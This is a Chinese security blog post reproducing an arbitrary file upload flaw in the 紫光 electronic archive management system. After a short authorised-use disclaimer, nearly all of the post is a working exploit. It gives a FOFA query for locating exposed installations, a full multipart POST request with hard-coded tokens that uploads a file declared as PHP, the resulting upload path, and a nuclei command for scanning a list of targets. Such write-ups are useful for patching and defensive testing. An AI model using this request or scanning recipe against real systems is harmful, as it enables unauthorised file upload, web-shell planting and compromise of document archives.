紫光电子档案管理系统存在任意文件上传漏洞

admin 2024年5月21日23:21:58评论44 views字数 1363阅读4分32秒阅读模式

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。

0x02 漏洞描述

紫光电子档案管理系统存在任意文件上传漏洞。

漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

0x03 漏洞复现

fofa-query: app="紫光档案管理系统"

1.输入下数据包,得到回显

POST /System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 600Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT

------WebKitFormBoundarygIRYWNxmDYiZBguTContent-Disposition: form-data; name="userID"

admin------WebKitFormBoundarygIRYWNxmDYiZBguTContent-Disposition: form-data; name="fondsid"

1------WebKitFormBoundarygIRYWNxmDYiZBguTContent-Disposition: form-data; name="comid"

1------WebKitFormBoundarygIRYWNxmDYiZBguTContent-Disposition: form-data; name="token"

6b79a77180e9ec3a7ca351ebe54641a2------WebKitFormBoundarygIRYWNxmDYiZBguTContent-Disposition: form-data; name="files[]"; filename="1111.txt"Content-Type: text/php

11111------WebKitFormBoundarygIRYWNxmDYiZBguT--

漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

2.访问上传路径,得到1.txt的内容/uploads/company1/fonds1/cms/20230906/UNIS-R0O41iGgBrdKEMQ1dZ3x0a4at.txt

漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

nuclei.exe -t ziguang-unis-upload-fileupload.yaml -l subs.txt

漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

原文始发于微信公众号(融云攻防实验室):漏洞复现 紫光电子档案管理系统存在任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日23:21:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   紫光电子档案管理系统存在任意文件上传漏洞http://cn-sec.com/archives/2012995.html

发表评论

匿名网友 填写信息